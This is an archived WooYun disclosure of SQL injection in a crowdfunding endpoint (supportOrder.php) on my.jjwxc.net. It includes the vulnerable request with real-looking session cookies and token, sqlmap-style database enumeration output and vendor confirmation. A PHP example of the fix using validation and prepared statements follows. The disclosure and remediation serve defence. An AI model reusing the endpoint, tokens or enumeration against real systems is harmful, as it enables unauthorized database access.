WooYun (WooYun.org) historical vulnerability lookup: http://wy.zone.ci/
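2015-08-12: Details reported to the vendor; awaiting vendor handling
2015-08-12: Vendor confirmed; details disclosed only to the vendor
2015-08-22: Details disclosed to core white hats and experts in related fields
2015-09-01: Details disclosed to regular white hats
2015-09-11: Details disclosed to intern white hats
2015-09-26: Details disclosed to the public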
As in the title.
Injection point
GET /crowdfunding/supportOrder.php?id=33&priceid=149 HTTP/1.1
Host: my.jjwxc.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: CNZZDATA30075907=cnzz_eid%3D434848196-1439182460-http%253A%252F%252Fwww.jjwxc.net%252F%26ntime%3D1439284534; __gads=ID=dd635bafc2021415:T=1439186463:S=ALNI_Mb9d4kJqQtFRy9J44HKB7nNC-KKZg; timeOffset_o=4418.89990234375; ispayuser=18289630-1; CNZZDATA1255436189=738594318-1439185101-http%253A%252F%252Fmy.jjwxc.net%252F%7C1439285538; Hm_lvt_9abb8a0f7324f452d17274e5caa6a727=1439201884; ad_play_index=19; Hm_lvt_2621cceb855168162d28a33806e75820=1439273501; Hm_lpvt_2621cceb855168162d28a33806e75820=1439273501; testcookie=yes; clicktype=; bbstoken=e836c081396913d7456d7173f607b4ca; nicknameAndsign=2%257E%2529%2524woo126; token=MTgyODk2MzB8NmFjYzJkODc3Njg2M2ZiMmRhMTlhM2ExYmI3MjkwN2F8fHRlc3RfY3VtdEAxMjYuY29tfHx8MXx8fOasoui%2FjuaCqO%2B8jOaZi%2Baxn%2BeUqOaIt3wwfGVtYWls; sms_total=3
Connection: keep-alive
[18:14:09] [INFO] fetching database names
[18:14:09] [INFO] the SQL query used returns 7 entries
[18:14:10] [INFO] retrieved: "information_schema"
[18:14:10] [INFO] retrieved: "ip"
[18:14:10] [INFO] retrieved: "mysql"
[18:14:10] [INFO] retrieved: "performance_schema"
[18:14:10] [INFO] retrieved: "phpmyadmin"
[18:14:11] [INFO] retrieved: "selfnovel"
[18:14:11] [INFO] retrieved: "test"
available databases [7]:
[*] information_schema
[*] ip
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] selfnovel
[*] test
database management system users [82]:
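Same as above
Filtering
Severity: High
Vulnerability Rank: 15
Confirmation time: 2015-08-12 17:40
Technical staff have been assigned to handle this. Thank you very much for your support!
None yet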
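The fix suggested above is input filtering on the `id` and `priceid` parameters of `supportOrder.php`. The following is an added example, not code from the report or from the affected site: it validates both parameters as positive integers and binds them in a prepared statement. The function names, the `price` table and its columns are hypothetical, and in-memory SQLite stands in for the site's MySQL.

```php
<?php
// Added example: hypothetical handler logic, not the site's code. Table and
// column names are assumptions; in-memory SQLite stands in for MySQL.
declare(strict_types=1);

/** Return a positive integer parsed from $raw, or null for anything else. */
function positive_int(mixed $raw): ?int
{
    if (!is_string($raw)) {          // rejects arrays such as id[]=33
        return null;
    }
    $v = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $v === false ? null : $v;
}

/** Look up one price tier; both values are bound, never concatenated. */
function find_price(PDO $db, array $query): ?array
{
    $id      = positive_int($query['id'] ?? null);
    $priceId = positive_int($query['priceid'] ?? null);
    if ($id === null || $priceId === null) {
        return null;                 // caller should answer 400 without querying
    }
    $stmt = $db->prepare(
        'SELECT project_id, price_id, amount FROM price
          WHERE project_id = :id AND price_id = :priceid'
    );
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->bindValue(':priceid', $priceId, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// With pdo_mysql, also set PDO::ATTR_EMULATE_PREPARES to false (server-side binding).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE price (project_id INTEGER, price_id INTEGER, amount INTEGER)');
$db->exec('INSERT INTO price VALUES (33, 149, 50)');   // constructed sample row

// Constructed inputs: the query string from the report, then malformed variants.
$samples = ['id=33&priceid=149', 'id=33&priceid=149%27', 'id[]=33&priceid=149', 'id=33'];
foreach ($samples as $qs) {
    parse_str($qs, $query);
    $row = find_price($db, $query);
    printf("%-24s => %s\n", $qs, $row === null ? 'rejected/not found' : json_encode($row));
}
```

Only the first sample returns a row. The other three never reach the database because validation fails before the statement is prepared.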